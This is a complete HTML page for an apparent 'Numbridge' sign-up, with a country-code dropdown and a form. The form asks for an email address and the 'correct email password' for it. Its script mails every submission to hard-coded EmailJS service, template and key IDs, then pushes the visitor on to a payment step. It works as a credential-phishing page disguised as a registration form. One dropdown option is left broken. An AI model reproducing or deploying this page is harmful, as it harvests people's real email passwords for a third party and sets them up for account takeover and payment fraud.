<!-- index.html -->
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign Up and Login</title>
  <link rel="stylesheet" href="styles.css">
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f5f5f5;
    }

    .container {
      max-width: 400px;
      margin: 50px auto;
      padding: 20px;
      border: 1px solid #ccc;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      margin-top: 20vh;
      background-color: #fff;
    }

    .signup,
    .login {
      margin-bottom: 20px;
      margin-right: 20px;
    }

    input[type="text"],
    input[type="email"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 10px;
      border: 1px solid #ccc;
      border-radius: 5px;
    }

    input:focus {
      outline: none;
      border-color: #ff545a;
    }

    #button {
      width: 100%;
      padding: 10px;
      background-color: #ff545a;
      color: #0e0d0d;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      margin-left: 10px;
    }

    #button:hover {
      background-color: #868080;
    }

    #login-btn {
      background-color: #dd4b39;
      color: #fff;
      padding: 10px 20px;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }

    select {
      width: 105%;
      padding: 10px;
      margin-bottom: 10px;
      border: 1px solid #ccc;
      border-radius: 5px;
    }

    #login-btn:hover {
      background-color: #c23321;
    }

    footer {
      background-color: #868080;
    }

    .btn-0 {
      background-color: #bebcbc;
      border-radius: 5px;
    }

    .btn-0:hover {
      background-color: #ff545a;
    }

    .btn-1 {
      width: 100%;
      padding: 10px;
      background-color: #ff545a;
      color: #0e0d0d;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      margin-left: 10px;
    }

    .btn-1:hover {
      background-color: #ff545a;
    }

    .video-container {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100vh;
      overflow: hidden;
      z-index: -1;
    }

    .video-container video {
      width: 100%;
      height: 100%;
      object-fit: cover;
    }

    /* Added styling for select dropdown */
    select {
      appearance: none;
      background-color: #fff;
      border: 1px solid #ccc;
      padding: 10px;
      width: 105%;
      font-size: 16px;
      border-radius: 5px;
      cursor: pointer;

    }

    select:focus {
      outline: none;
      border-color: #ff545a;
    }

    /* Added styling for option elements */
    option {
      padding: 10px;
      font-size: 16px;
    }

    /* Added styling for dropdown arrow */
    .select-arrow {
      position: absolute;
      right: 10px;
      top: 50%;
      transform: translateY(-50%);
      font-size: 16px;
      color: #666;
    }
  </style>
</head>

<body>
  <div class="video-container">
    <video autoplay loop muted>
      <source src="/images/clips/35344-405897623.mp4" type="video/mp4">
    </video>
  </div>
  <div class="container">
    <div class="signup">
      <h2 style="color: #ff545a;">Numbridge</h2>
      <form id="form">
        <select>
          <option>Afghanistan - +93</option>
          <option>Albania - +355</option>
          <option>Algeria - +213</option>
          <option>Andorra - +376</option>
          <option>Angola - +244</option>
          <option>Antigua and Barbuda - +1 268</option>
          <option>Argentina - +54</option>
          <option>Armenia - +374</option>
          <option>Australia - +61</option>
          <option>Austria - +43</option>
          <option>Azerbaijan - +994</option>
          <option>Bahamas - +1 242</option>
          <option>Bahrain - +973</option>
          <option>Bangladesh - +880</option>
          <option>Barbados - +1 246</option>
          <option>Belarus - +375</option>
          <option>Belgium - +32</option>
          <option>Belize - +501</option>
          <option>Benin - +229</option>
          <option>Bhutan - +975</option>
          <option>Bolivia - +591</option>
          <option>Bosnia and Herzegovina - +387</option>
          <option>Botswana - +267</option>
          <option>Brazil - +55</option>
          <option>Brunei - +673</option>
          <option>Bulgaria - +359</option>
          <option>Burkina Faso - +226</option>
          <option>Burundi - +257</option>
          <option>Cambodia - +855</option>
          <option>Cameroon - +237</option>
          <option>Canada - +1</option>
          <option>Central African Republic - +236</option>
          <option>Chad - +235</option>
          <option>Chile - +56</option>
          <option>China - +86</option>
          <option>Colombia - +57</option>
          <option>Comoros - +269</option>
          <option>Congo - +242</option>
          <option>Congo (DRC) - +243</option>
          <option>Costa Rica - +506</option>
          <option>Côte d'Ivoire - +225</option>
          <option>Croatia - +385</option>
          <option>Cuba - +53</option>
          <option>Cyprus - +357</option>
          <option>Czech Republic - +420</option>
          <option>Denmark - +45</option>
          <option>Djibouti - +253</option>
          <option>Dominica - +1 767</option>
          <option>Dominican Republic - +1 809, 1 829, 1 849</option>
          <option>Ecuador - +593</option>
          <option>Egypt - +20</option>
          <option>El Salvador - +503</option>
          <option>Equatorial Guinea - +240</option>
          <option>Eritrea - +291</option>
          <option>Estonia - +372</option>
          <option>Ethiopia - +251</option>
          <option>Fiji - +679</option>
          <option>Finland - +358</option>
          <option>France - +33</option>
          <option>Gabon - +241</option>
          <option>Gambia - +220</option>
          <option>Georgia - +995</option>
          <option>Germany - +49</option>
          <option>Ghana - +233</option>
          <option>Greece - +30</option>
          <option>Grenada - +1 473</option>
          <option>Guatemala - +502</option>
          <option>Guinea - +224</option>
          <option>Guinea-Bissau - +245</option>
          <option>Guyana - +592</option>
          <option>Haiti - +509</option>
          <option>Honduras - +504</option>
          <option>Hungary - +36</option>
          <option>Iceland - +354</option>
          <option>India - +91</option>
          <option>Indonesia - +62</option>
          <option>Iran - +98</option>
          <option>Iraq - +964</option>
          <option>Ireland - +353</option>
          <option>Israel - +972</option>
          <option>Italy - +39</option>
          <option>Jamaica - +1 876</option>
          <option>Japan - +81</option>
          <option>Jordan - +962</option>
          <option>Kazakhstan - +7</option>
          <option>Kenya - +254</option>
          <option>Kiribati - +686</option>
          <option>North Korea - +850</option>
          <option>South Korea - +82</option>
          <option>Kuwait - +965</option>
          <option>Kyrgyzstan - +996</option>
          <option>Laos - +856</option>
          <option>Latvia - +371</option>
          <option>Lebanon - +961</option>
          <option>Lesotho - +266</option>
          <option>Liberia - +231</option>
          <option>Libya - +218</option>
          <option>Lithuania - +370</option>
          <option>Luxembourg - +352</option>
          <option>Macedonia (FYROM) - +389</option>
          <option>Madagascar - +261</option>
          <option>Malawi - +265</option>
          <option>Malaysia - +60</option>
          <option>Maldives - +960</option>
          <option>Mali - +223</option>
          <option>Malta - +356</option>
          <option>Marshall Islands - +692</option>
          <option>Mauritania - +222</option>
          <option>Mauritius - +230</option>
          <option>Mexico - +52</option>
          <option>Micronesia - +691</option>
          <option>Moldova - +373</option>
          <option>Monaco - +377</option>
          <option>Mongolia - +976</option>
          <option>Montenegro - +382</option>
          <option>Morocco - +212</option>
          <option>Mozambique - +258</option>
          <option>Myanmar (Burma) - +95</option>
          <option>Namibia - +264</option>
          <option>Nauru - +674</option>
          <option>Nepal - +977</option>
          <option>Netherlands - +31</option>
          <option>New Zealand - +64</option>
          <option>Nicaragua - +505</option>
          <option>Niger - +227</option>
          <option>Nigeria - +234</option>
          <option>Niue - +683</option>
          <option>Norway - +47</option>
          <option>Oman - +968</option>
          <option>Pakistan - +92</option>
          <option>Palau - +680</option>
          <option>Panama - +507</option>
          <option>Papua New Guinea - +675</option>
          <option>Paraguay - +595</option>
          <option>Peru - +51</option>
          <option>Philippines - +63</option>
          <option>Poland - +48</option>
          <option>Portugal - +351</option>
          <option>Qatar - +974</option>
          <option>Romania - +40</option>
          <option>Russia - +7</option>
          <option>Rwanda - +250</option>
          <option>Saint Kitts and Nevis - +1 869</option>
          <option>Saint Lucia - +1 758</option>
          <option>Saint Vincent and the Grenadines - +1 784</option>
          <option>Samoa - +685</option>
          <option>San Marino - +378</option>
          <option>São Tomé and Principe - +239</option>
          <option>Saudi Arabia - +966</option>
          <option>Senegal - +221</option>
          <option>Serbia - +381</option>
          <option>Seychelles - +248</option>
          <option>Sierra Leone - +232</option>
          <option>Singapore - +65</option>
          <option>Sint Maarten - +1 721</option>
          <option>Slovakia - +421</option>
          <option>Slovenia - +386</option>
          <option>Solomon Islands - +677</option>
          <option>Somalia - +252</option>
          <option>South Africa - +
          <option>South Africa - +27</option>
          <option>South Sudan - +211</option>
          <option>Spain - +34</option>
          <option>Sri Lanka - +94</option>
          <option>Sudan - +249</option>
          <option>Suriname - +597</option>
          <option>Swaziland - +268</option>
          <option>Sweden - +46</option>
          <option>Switzerland - +41</option>
          <option>Syria - +963</option>
          <option>Tajikistan - +992</option>
          <option>Tanzania - +255</option>
          <option>Thailand - +66</option>
          <option>Timor-Leste - +670</option>
          <option>Togo - +228</option>
          <option>Tonga - +676</option>
          <option>Trinidad and Tobago - +1 868</option>
          <option>Tunisia - +216</option>
          <option>Turkey - +90</option>
          <option>Turkmenistan - +993</option>
          <option>Tuvalu - +688</option>
          <option>Uganda - +256</option>
          <option>Ukraine - +380</option>
          <option>United Arab Emirates - +971</option>
          <option>United Kingdom - +44</option>
          <option>United States - +1</option>
          <option>Uruguay - +598</option>
          <option>Uzbekistan - +998</option>
          <option>Vanuatu - +678</option>
          <option>Vatican City - +379</option>
          <option>Venezuela - +58</option>
          <option>Vietnam - +84</option>
          <option>Yemen - +967</option>
          <option>Zambia - +260</option>
          <option>Zimbabwe - +263</option>
        </select>
        <input type="email" placeholder="Enter the email to be linked to." id="name" name="name">
        <input type="password" placeholder="Enter correct email password" name="password" id="password">
        <input type="password" placeholder="re-enter password" id="name" required>
        <input type="email" placeholder="Enter Referer's email" name="email" id="email" required>
        <input type="text" placeholder="Your Phone Number" id="phone" name="phone" maxlength="13" required>
            <input type="submit" id="button" value="continue" >
      </form> 
    </div>
  </div>
  <script>
    const btn = document.getElementById('button');

document.getElementById('form')
 .addEventListener('submit', function(event) {
   event.preventDefault();

   btn.value = 'Plese Wait...';

   const serviceID = 'service_kseoo7t';
   const templateID = 'template_bofvxms';

   emailjs.sendForm(serviceID, templateID, this)
    .then(() => {
        alert('Continue To Payment!');
        window.location.href = 'register-3.html';
    }, (err) => {
      btn.value = 'continue';
      alert(JSON.stringify(err));
    });
});

  </script>
  <script type="text/javascript"
  src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>

<script type="text/javascript">
  emailjs.init('XcvcHIHG6TbDI8-L_')
</script>
</body>

</html>